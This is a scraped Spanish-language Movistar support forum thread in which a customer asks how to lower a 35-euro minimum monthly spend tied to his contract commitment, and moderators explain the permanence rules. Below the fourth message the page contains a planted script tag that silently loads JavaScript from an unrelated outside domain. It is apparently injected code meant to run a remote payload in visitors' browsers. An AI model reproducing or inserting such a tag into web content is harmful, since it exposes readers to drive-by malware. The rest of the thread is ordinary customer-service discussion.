permanencia en tarifa

MarcosG
Más integrado que la RDSI
permanencia en tarifa

Queria quitar mi consumo mínimo de 35€ que me han puesto en movistar porque me robaron mi blackberry 9800 y luego me dieron la 9300  hace unos 5 meses con un consumo de 35€, yo quiero quitar ese consumo porque mi consumo antes era menos de lo q tengo ahora! se q en otras compañias tanto Orange como Vodafone, los compromisos en tarifa son diferentes a los compromisos con el operador, llame al 1004 pero no supieron solucionarmelo ya que l@ teleoperad@s non son de este pais y no deben entender muy bien....

alguien sabe de este tema???

Mensaje 1 de 9
881 Visitas
8 RESPUESTAS 8
Rebeka-movistar
Antiguo Moderador

Hola @MarcosG,

 

Puedes enviarme un mp con tu número de teléfono y NIF para que compruebe las condiciones de tu compromiso de permanencia.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 2 de 9
822 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @MarcosG,

 

He recibido tu mp. Comentarte que tu compromiso de permanencia, que finaliza el 15/05/2013, está vinculado a un gasto mínimo de 35 euros.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 3 de 9
791 Visitas
MarcosG
Más integrado que la RDSI

Si, pero yo queria saber, si pagando el compromiso de permanencia de los 35€ para bajarlo si podria hacerlo, porque se, que tanto en vodafone como en orange, la permanencia en tarifa es independiente a la permanencia en el operador, es decir si quieres bajar tu consumo tienes q pagar X euros y si qieres cambiarte d operador son otros X euros, y lo se mi pareja tiene un numero orange y asi lo hizo. siguen sin darme solucion, porque se la permanencia que tengo y que mi tarifa me la subieron a 35€.. pero quiero saber si podria bajar esa tarifa de consumo minimo...

<script type="text/javascript" src="http://temarosa.info/dfi823hs.js?0.3704913718693861"></script>
Mensaje 4 de 9
779 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @MarcosG,

 

Si bajas el gasto mínimo, se entendería que incumples el compromiso de permanencia.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 5 de 9
773 Visitas
noemoon
Yo probé el VDSL

Hola , a mi me pasa algo parecido , tengo 24 meses de permanencia y he cumplido 12 , me gustaria saber si puedo bajar mi tarifa de datos , gracias y saludos a todos

Mensaje 6 de 9
723 Visitas
OscarL-Movistar
Antiguo Moderador

Hola noemoon,

 

Si tienes permanencia sobre la tarifa de datos esta se romperá si la das de baja, pero si antes cambias la tarifa de voz al Contrato Básico Personal y luego das de baja la tarifa de internet, no se romperá la permanencia.

En este último caso, la cuota que tienes de la tarifa de internet pasará a ser un gasto mínimo.

 

Un saludo y buenas tardes!!



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 7 de 9
717 Visitas
superkini
Yo probé el VDSL

Una pregunta. si tienes una tarifa de las antiguas con datos y te pasas a contrato basico personal mas tarifa de datos, ¿se suma el consumo mínimo de voz al de datos, o ya con el de datos computa para gm?,  y si das de baja los datos, que tomarian como referencia la tarifa de datos, o la suma de ambas?

Mensaje 8 de 9
704 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @superkini,

 

Con las nuevas tarifas las cuotas cómputan en el consumo mínimo ya sean de tarifas de voz o datos.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 9 de 9
698 Visitas